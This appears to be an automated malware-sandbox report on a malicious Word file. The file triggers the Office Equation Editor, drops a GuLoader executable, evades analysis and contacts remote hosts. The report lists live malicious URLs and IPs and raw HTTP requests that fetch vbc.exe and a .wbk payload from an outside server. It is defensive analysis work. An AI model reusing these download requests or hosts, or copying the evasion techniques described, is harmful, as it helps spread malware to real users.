Source: C:\Users\Public\vbc.exe	Code function: 9_2_03693CD9 push CACC293Ch; retf	9_2_03693CE4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03695EB5 push D0CC293Ch; retf	9_2_03695EC0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03692C99 push edx; retf	9_2_03692CCC

PE file contains sections with non-standard names

Source: secur32.dll.9.dr

Static PE information: section name: .didat

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 9_2_73281BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

9_2_73281BFF

Binary contains a suspicious time stamp

Source: secur32.dll.9.dr

Static PE information: 0xAEC0B68B [Mon Nov 27 15:00:27 2062 UTC]

Persistence and Installation Behavior

Contains an external reference to another file

Source: webSettings.xml.rels

Extracted files from sample: https://onebztip.club/index.php/x

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\sxsstore.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\secur32.dll	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2532

Thread sleep time: -420000s >= -30000s

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\Public\vbc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sxsstore.dll

Jump to dropped file

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 9_2_03699366 rdtsc

9_2_03699366

Source: C:\Users\Public\vbc.exe	Code function: 9_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	9_2_00405C49
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00406873 FindFirstFileW,FindClose,	9_2_00406873
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0040290B FindFirstFileW,	9_2_0040290B

Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node

Source: vbc.exe, 00000009.00000002.722175818.0000000000264000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 9_2_73281BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

9_2_73281BFF

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 9_2_03699366 rdtsc

9_2_03699366

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 9_2_03699128 mov eax, dword ptr fs:[00000030h]	9_2_03699128
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369C501 mov eax, dword ptr fs:[00000030h]	9_2_0369C501
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369DAF1 mov eax, dword ptr fs:[00000030h]	9_2_0369DAF1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369CAD3 mov eax, dword ptr fs:[00000030h]	9_2_0369CAD3

Source: C:\Users\Public\vbc.exe

Code function: 9_2_0369EF3F RtlAddVectoredExceptionHandler,

9_2_0369EF3F

HIPS / PFW / Operating System Protection Evasion

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"

Jump to behavior

Source: C:\Users\Public\vbc.exe

9_2_0040352D

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
66.29.141.207	onebztip.club	United States		19538	ADVANTAGECOMUS	true
107.172.93.32	unknown	United States		36352	AS-COLOCROSSINGUS	false

Contacted Domains

Name	IP	Active
onebztip.club	66.29.141.207	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.konutmarket.com/2022file_iz	true	Avira URL Cloud: safe	unknown
https://onebztip.club/index.php/x	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://107.172.93.32/invoice/dhl_shp.wbk	true	Avira URL Cloud: malware	unknown
http://107.172.93.32/309/vbc.exe	true	Avira URL Cloud: malware	unknown

AV Detection

Found malware configuration

Source: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.konutmarket.com/2022file_iz"}

Multi AV Scanner detection for submitted file

Source: PO-AWE9934.docx	Virustotal: Detection: 26%			Perma Link
Source: PO-AWE9934.docx	ReversingLabs: Detection: 16%

Antivirus detection for URL or domain

Source: http://107.172.93.32/invoice/dhl_shp.wbk	Avira URL Cloud: Label: malware
Source: http://107.172.93.32/309/vbc.exe	Avira URL Cloud: Label: malware

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Compliance

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49177 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49167 version: TLS 1.2

Source:	Binary string: secur32.pdb source: secur32.dll.9.dr
Source:	Binary string: SxsStore.pdb source: sxsstore.dll.9.dr
Source:	Binary string: secur32.pdbUGP source: secur32.dll.9.dr
Source:	Binary string: SxsStore.pdbGCTL source: sxsstore.dll.9.dr

Source: C:\Users\Public\vbc.exe	Code function: 9_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	9_2_00405C49
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00406873 FindFirstFileW,FindClose,	9_2_00406873
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0040290B FindFirstFileW,	9_2_0040290B

Software Vulnerabilities

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: onebztip.club

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 66.29.141.207:443

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 66.29.141.207:443

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://www.konutmarket.com/2022file_iz

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 107.172.93.32 107.172.93.32

Downloads executable code via HTTP

Source: global traffic

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49177 version: TLS 1.0

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /index.php/x HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: onebztip.clubConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /invoice/dhl_shp.wbk HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 107.172.93.32Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /309/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.93.32Connection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32

Source: invoice on 107.172.93.32.url.0.dr	String found in binary or memory: http://107.172.93.32/invoice/
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: vbc.exe, 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000009.00000000.453547212.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: x.url.0.dr	String found in binary or memory: https://onebztip.club/index.php/x
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB971226-827B-47B0-8F41-C98C9532A108}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: onebztip.club

Source: global traffic	HTTP traffic detected: GET /index.php/x HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: onebztip.clubConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /invoice/dhl_shp.wbk HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 107.172.93.32Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /309/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.93.32Connection: Keep-Alive

Source: unknown

HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49167 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

9_2_004056DE

System Summary

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe			Jump to dropped file
